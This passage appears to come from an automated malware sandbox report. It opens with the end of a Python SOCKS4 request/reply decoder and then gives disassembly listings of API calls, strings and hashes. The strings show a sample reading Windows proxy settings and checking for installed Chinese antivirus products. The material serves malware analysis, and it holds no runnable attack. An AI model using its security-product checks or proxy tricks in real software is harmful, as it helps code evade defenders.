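    """Encode a SOCKS4 CONNECT request: VN(1) CD(1) DSTPORT(2, BE) DSTIP(4) USERID NUL."""
    if not 0 < dst_port < 65536:
        raise ValueError("port out of range")
    header = struct.pack("!BBH", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, dst_port)
    return header + socket.inet_aton(dst_ip) + userid.encode("ascii") + b"\x00"


def parse_reply(reply: bytes, dst_ip: str, dst_port: int) -> tuple[bool, str]:
    """Decode the 8-byte SOCKS4 reply (VN CD DSTPORT DSTIP) into (granted, message).

    The reply's VN field is 0 in SOCKS4 even though the recovered string talks
    about "version 4"; libcurl checks the byte against 0 and logs that message.
    """
    if len(reply) < 8:
        return False, "Failed to receive SOCKS4 connect request ack."
    vn, cd = reply[0], reply[1]
    if vn != 0:
        return False, "SOCKS4 reply has wrong version, version should be 4."
    if cd == REPLY_GRANTED:
        return True, "SOCKS4 request granted."
    suffix = REPLY_MESSAGES.get(cd, "Unknown.")
    return False, (f"Can't complete SOCKS4 connection to {dst_ip}:{dst_port}. "
                   f"({cd}), {suffix}")


def demo() -> list[str]:
    """Walk constructed replies through the decoder (sample data, not captured traffic)."""
    dst_ip, dst_port = "10.0.0.5", 8080
    request = build_connect_request(dst_ip, dst_port, userid="anon")
    replies = [
        b"\x00\x5a" + b"\x00" * 6,  # 90: granted
        b"\x00\x5b" + b"\x00" * 6,  # 91: rejected or failed
        b"\x00\x5c" + b"\x00" * 6,  # 92: identd unreachable
        b"\x00\x5d" + b"\x00" * 6,  # 93: user-id mismatch
        b"\x00\x63" + b"\x00" * 6,  # 99: not in the table -> "Unknown."
        b"\x04\x5a" + b"\x00" * 6,  # wrong VN byte
        b"\x00\x5a",                # truncated ack
    ]
    out = [f"request: {request.hex()}"]
    for r in replies:
        _, msg = parse_reply(r, dst_ip, dst_port)
        out.append(msg)
    return out


if __name__ == "__main__":
    print("\n".join(demo()))
```

Running the block prints the request bytes followed by each message exactly as the sample would format it, which is handy when matching proxy logs or a PCAP against the strings recovered from memory.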

APIs
• _strcpy_s.LIBCMT ref: 0049AA8C
• __invoke_watson.LIBCMT ref: 0049AA9D
• GetModuleFileNameA.KERNEL32(00000000,0050EDD1,00000104,0049AF7A,00000001,00000214), ref: 0049AAB9
• _strcpy_s.LIBCMT ref: 0049AACE
• __invoke_watson.LIBCMT ref: 0049AAE1
• _strlen.LIBCMT ref: 0049AAEA
• _strlen.LIBCMT ref: 0049AAF7
• __invoke_watson.LIBCMT ref: 0049AB24
• _strcat_s.LIBCMT ref: 0049AB37
• __invoke_watson.LIBCMT ref: 0049AB48
• _strcat_s.LIBCMT ref: 0049AB59
• __invoke_watson.LIBCMT ref: 0049AB6A
• GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000,77E34620,00000003,0049ABEC,000000FC,0048E3CB,00000001,00000000,00000000,?,004994D0,0049AF7A,00000001), ref: 0049AB89
• _strlen.LIBCMT ref: 0049ABAA
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004994D0,0049AF7A,00000001,00000001,00499DC5,00000018,00500298,0000000C,00499E54,00000001), ref: 0049ABB4
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 1879448924-4022980321
• Opcode ID: 39b36d9f9ff413034331b55d55a7594fc6a34cbd790f1d950c9e7be3ec3bca07
• Instruction ID: baa430f7f53842fbb56f29521c4e879f46f90ef76b4d5e1b54ab1bb88b2fc185
• Opcode Fuzzy Hash: 39b36d9f9ff413034331b55d55a7594fc6a34cbd790f1d950c9e7be3ec3bca07
• Instruction Fuzzy Hash: 1D3128629012157EEE2136265C0AF7F3E4E9B22319F14053BFE0592283EA4D9A2581FF
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDirectoryA.KERNEL32 ref: 004B6C16
• _strcpy_s.LIBCMT ref: 004B6C38
• _strcat_s.LIBCMT ref: 004B6C4A
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,00000000), ref: 004B6C5F
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004B6C6D
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004B6C78
• _strcpy_s.LIBCMT ref: 004B6C90
• _strcat_s.LIBCMT ref: 004B6CA2
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004B6CB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004B6CBF
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004B6CCA
• GetProcAddress.KERNEL32(00000000,?), ref: 004B6CDD
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004B6CF4
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeProc$Load_strcat_s_strcpy_s$DirectorySystem
                                                                                                                                                • String ID: \ws2_32$\wship6$`ZO$getaddrinfo$pZO$|ZO
                                                                                                                                                • API String ID: 2766041494-2664394553
                                                                                                                                                • Opcode ID: abaf649a4c267fc27b9c80b4b11db1e3b9e87e66ea417b8385becc90f99c1635
                                                                                                                                                • Instruction ID: 470e24e870a4bbc9522796aecfdd697d73249b13842664f9d7f97bd385b23fbd
                                                                                                                                                • Opcode Fuzzy Hash: abaf649a4c267fc27b9c80b4b11db1e3b9e87e66ea417b8385becc90f99c1635
                                                                                                                                                • Instruction Fuzzy Hash: 1F41C5729002089ADB20DF66DC88FEF7AB8FF49744F56452EEA49D7201DB3C8505CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strlen$_strncmp
• String ID: %25$://$Invalid IPv6 address format$Please URL encode %% as %%25, see RFC 6874.$socks$socks4$socks4a$socks5$socks5h
• API String ID: 3685948395-420296824
• Opcode ID: 8e4f1ce4bb3fb64a4aed56da453e5af3b05d702756399579c05410022f42ae43
• Instruction ID: d95464bbb866e7510533b720aa7b246abe4a72e61584bcd624e6f8fe2bbf81b4
• Opcode Fuzzy Hash: 8e4f1ce4bb3fb64a4aed56da453e5af3b05d702756399579c05410022f42ae43
• Instruction Fuzzy Hash: 349136B1904205AEFB206B318C81BFF7BA9EF51316F24046BF55591282EB7C8A419B7D
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041CD92
  • Part of subcall function 00412330: __EH_prolog.LIBCMT ref: 00412335
  • Part of subcall function 00412581: __EH_prolog.LIBCMT ref: 00412586
  • Part of subcall function 004120D2: __EH_prolog.LIBCMT ref: 004120D7
  • Part of subcall function 004120D2: PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000), ref: 00412113
  • Part of subcall function 00412637: __EH_prolog.LIBCMT ref: 0041263C
  • Part of subcall function 0041270B: __EH_prolog.LIBCMT ref: 00412710
  • Part of subcall function 0040D68A: __EH_prolog.LIBCMT ref: 0040D68F
  • Part of subcall function 0040D647: __EH_prolog.LIBCMT ref: 0040D64C
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog$ExistsFilePath
• String ID: 2345Explorer$360safe$BaiDuAntivirus$BaiDuSafe$DisplayIcon$QQGuanJia$RuiXing$SOFTWARE\2345Explorer$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverGenius$UninstallString$duba$path$qdjl$|P
• API String ID: 3509989144-941706189
• Opcode ID: 091cbeeac2b6faf6585a66d20c92dbadd4f04bb2b964d72b58fefbac58033b0a
• Instruction ID: 285b5647e5067509fdacffb451fc92eb98861bd5fc6fefce4b3b2e7dd5930372
• Opcode Fuzzy Hash: 091cbeeac2b6faf6585a66d20c92dbadd4f04bb2b964d72b58fefbac58033b0a
• Instruction Fuzzy Hash: 73618472D0124CEECB00EBF585866EEBAB59B04318F25816FE511B71C1DBBC9A45875C
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040E202
• _memset.LIBCMT ref: 0040E234
• _memset.LIBCMT ref: 0040E249
• RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000001,?,?,?,?,?,00000000,0050EB7C), ref: 0040E272
• RegCloseKey.ADVAPI32(?,?,ProxyEnable,?,?,?,?,?,00000000,0050EB7C), ref: 0040E298
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,0050EB7C), ref: 0040E2AF
• RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000001,?,?,?,?,?,00000000,0050EB7C), ref: 0040E2CE
• RegCloseKey.ADVAPI32(?,?,ProxyServer,?,?,?,?,00000000,0050EB7C), ref: 0040E3E0
  • Part of subcall function 0040F6CC: RegQueryValueExW.ADVAPI32(00000050,0040DF01,00000000,?,?,?,?,?,0040DF01,00000050), ref: 0040F6EC
• _wcscpy_s.LIBCMT ref: 0040E391
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Close$Open_memset$H_prologQueryValue_wcscpy_s
• String ID: ProxyEnable$ProxyServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$http=$socks=
• API String ID: 676752552-2154615313
• Opcode ID: 6f2903df03352798eb81c86fc18b64b181ae04729193dd271c9179ecd3719d45
• Instruction ID: 12e751ca2b4c672172519b555a330813ab4efef8d76515500dbba4c9a2bbe59f
• Opcode Fuzzy Hash: 6f2903df03352798eb81c86fc18b64b181ae04729193dd271c9179ecd3719d45
• Instruction Fuzzy Hash: 67511EB1D0121DABCF10EF95DC85AEEBBB8EB44304F50487BE914B3281D7789A448B68
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strncmp
• String ID: ,name:$,value:$.\crypto\x509v3\v3_pci.c$file:$hex:$language$pathlen$policy$section:$text:
• API String ID: 909875538-2070401741
• Opcode ID: fdc1b93f25688d0bd9eafcde4b0c5eb53cbb9244fa60177ea7182ac2dcec8d1c
• Instruction ID: 11221705fed23dc97c5242fe261212a475ca65eec05d44b9410ac1f4fffb2b63
• Opcode Fuzzy Hash: fdc1b93f25688d0bd9eafcde4b0c5eb53cbb9244fa60177ea7182ac2dcec8d1c
• Instruction Fuzzy Hash: FBD18B74740340AFE710DF55CC82F6673A5AB98B06F14855AFD089F387E6B8E809CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strncmp
• String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
• API String ID: 909875538-2733969777
• Opcode ID: 20a175ab4f7ce598e895abd994e9e2644b1e1b7c9569141e9ff058bf25f24b37
• Instruction ID: 0c45283ed44810c87d11ebe5f1a3449959d2784316513a730e5802d856fe7d28
• Opcode Fuzzy Hash: 20a175ab4f7ce598e895abd994e9e2644b1e1b7c9569141e9ff058bf25f24b37
• Instruction Fuzzy Hash: E9F12971704351AFD720EF11E842F6BB3D5AFA4304F48482EF98997242E6B9E905C79B
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004030CD
  • Part of subcall function 00403408: lstrcmpiW.KERNEL32(?,>%@,00403110,?,?,00000000,00000000,>%@,?,00402E90,?,?,00000000,>%@), ref: 00403472
• lstrlenW.KERNEL32(?,00000000,00000000,>%@,?,00402E90,?,?,00000000,>%@), ref: 0040316A
• CharNextW.USER32(?,?,00402E90,?,?,00000000,>%@), ref: 004031D5
• CharNextW.USER32(00000000,?,00402E90,?,?,00000000,>%@), ref: 004031ED
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CharNext$H_prologlstrcmpilstrlen
• String ID: >%@$>%@
• API String ID: 1004901364-4113083449
• Opcode ID: 0f3c6345bc126c1004429ad90b9eb99bd980c29fb9f6093f5a9af529f566e06e
• Instruction ID: 115320d8b23ae8ee68f97ac806c8282907a899bc19e0a8e6f6cd70280732b669
• Opcode Fuzzy Hash: 0f3c6345bc126c1004429ad90b9eb99bd980c29fb9f6093f5a9af529f566e06e
• Instruction Fuzzy Hash: 4291B6719001199BCB20DF65CC86AEE7BBCEB05305F1444BBEA05F32C0DA789F859B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 004A63F5
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004A6411
  • Part of subcall function 0049AD01: TlsGetValue.KERNEL32(00000000,0049AD76,00000000,004A63D6,00000000,00000000,00000314,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD0E
  • Part of subcall function 0049AD01: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD25
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004A642E
  • Part of subcall function 0049AD01: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD3A
  • Part of subcall function 0049AD01: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0049AD55
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004A6443
• __invoke_watson.LIBCMT ref: 004A6464
  • Part of subcall function 00490470: _memset.LIBCMT ref: 004904FC
  • Part of subcall function 00490470: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 0049051A
  • Part of subcall function 00490470: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00490524
  • Part of subcall function 00490470: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0049052E
  • Part of subcall function 00490470: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 00490549
  • Part of subcall function 00490470: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00490550
  • Part of subcall function 0049AD78: TlsGetValue.KERNEL32(00000000,0049AE28), ref: 0049AD85
  • Part of subcall function 0049AD78: TlsGetValue.KERNEL32(FFFFFFFF), ref: 0049AD9C
  • Part of subcall function 0049AD78: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0049ADB1
  • Part of subcall function 0049AD78: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0049ADCC
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 004A6478
• GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004A6490
• __invoke_watson.LIBCMT ref: 004A6503
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
• String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
• API String ID: 2940365033-1046234306
• Opcode ID: 6ecef83aa2716730498867a65f2fa2451b8c4b4dbb7a60916def2f5bb06e1577
• Instruction ID: 175471f90c68bc7dc1dda9af0b2fbc4e1290c8f71a04b1b3ef7f9b1878a6a51d
• Opcode Fuzzy Hash: 6ecef83aa2716730498867a65f2fa2451b8c4b4dbb7a60916def2f5bb06e1577
• Instruction Fuzzy Hash: 2141D4B1D00305BBCF20AFB6AC8596F7FA9EF65304B19053FE400D2544DB7D9A548B5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00412161
  • Part of subcall function 00411FE1: __EH_prolog.LIBCMT ref: 00411FE6
  • Part of subcall function 00411FE1: _memset.LIBCMT ref: 0041202F
  • Part of subcall function 00411FE1: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,004FC0BC,00000000), ref: 00412052
  • Part of subcall function 00411FE1: PathAddBackslashW.SHLWAPI(?,?,00000000,?,?,004FC0BC,00000000), ref: 0041209E
  • Part of subcall function 00411FE1: RegCloseKey.ADVAPI32(?,00000000), ref: 004120BD
• PathFindExtensionW.SHLWAPI(?,00000022,0000005C), ref: 00412258
• __wcsicmp.LIBCMT ref: 00412271
• __wcsicmp.LIBCMT ref: 00412282
• __wcsicmp.LIBCMT ref: 00412293
  • Part of subcall function 0048EC08: __wcsicmp_l.LIBCMT ref: 0048EC8E
• __wcsicmp.LIBCMT ref: 004122A4
• PathRemoveFileSpecW.SHLWAPI(00000000,?,00000000), ref: 004122B8
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __wcsicmp$Path$H_prolog$BackslashCloseExtensionFileFindOpenRemoveSpec__wcsicmp_l_memset
• String ID: .dll$.exe$.ico$.txt$|P
• API String ID: 1384066900-2672057931
• Opcode ID: f25dcf456e3378e61b00b43d838564fbcd831bc2d8cb03531ffb88b1e9166b2c
• Instruction ID: 966b9b1b77f7bbb738d12ad5aebcbd24678f0cdf18a8ca424cc820677e3b7483
• Opcode Fuzzy Hash: f25dcf456e3378e61b00b43d838564fbcd831bc2d8cb03531ffb88b1e9166b2c
• Instruction Fuzzy Hash: 08519331904119ABDF00FFA9CD42AEEBBB4AF00319F10452FF510B72D2D779AA548B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• _strlen.LIBCMT ref: 004C1125
• _sscanf.LIBCMT ref: 004C1115
  • Part of subcall function 00490B8E: _vscan_fn.LIBCMT ref: 00490BA3
• _sscanf.LIBCMT ref: 004C11AE
• _sscanf.LIBCMT ref: 004C11D9
• GetLastError.KERNEL32(00000000,00000000,00000000), ref: 004C11FB
• SetLastError.KERNEL32(00000000), ref: 004C1208
• GetLastError.KERNEL32 ref: 004C121E
• SetLastError.KERNEL32(?), ref: 004C122A
Strings
• %31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 004C110F
• %02d:%02d:%02d, xrefs: 004C11A8
• %02d:%02d, xrefs: 004C11D3
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$_sscanf$_strlen_vscan_fn
• String ID: %02d:%02d$%02d:%02d:%02d$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]
• API String ID: 2850275193-241090727
• Opcode ID: 7cc1afb9b62991018564bd398d4c40bc5a538748f3f21e8c5a6020e201d891d3
• Instruction ID: 12915fff1daca1ab2d54d9d84da65a510097f26c74440e22993a7b04dafcb0a0
• Opcode Fuzzy Hash: 7cc1afb9b62991018564bd398d4c40bc5a538748f3f21e8c5a6020e201d891d3
• Instruction Fuzzy Hash: 96C15E79D00259DBDF64DFA9D880BEEBBB4AB09314F24402FE904F7262D7385981CB58
Uniqueness
Uniqueness Score: -1.00%

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE14B
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE17A
• __fprintf_l.LIBCMT ref: 004BE1BF
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE1D2
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE201
• __fprintf_l.LIBCMT ref: 004BE218
• __fprintf_l.LIBCMT ref: 004BE22E
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__fprintf_l
                                                                                                                                                • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
                                                                                                                                                • API String ID: 2274657414-1858174321
                                                                                                                                                • Opcode ID: 4ad216edb1efe125fa54dc4547722f8effefd6d15e60853d68dadab834fbffcd
                                                                                                                                                • Instruction ID: 1c9a013f001e2e8857519af178cab9018db1dda18a126386f037f9154e27a785
                                                                                                                                                • Opcode Fuzzy Hash: 4ad216edb1efe125fa54dc4547722f8effefd6d15e60853d68dadab834fbffcd
                                                                                                                                                • Instruction Fuzzy Hash: 3731D8B2500208BEFF255E2A8C02FFF3E6DEBC5B54F10801ABD04A9181D6B99D109679
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
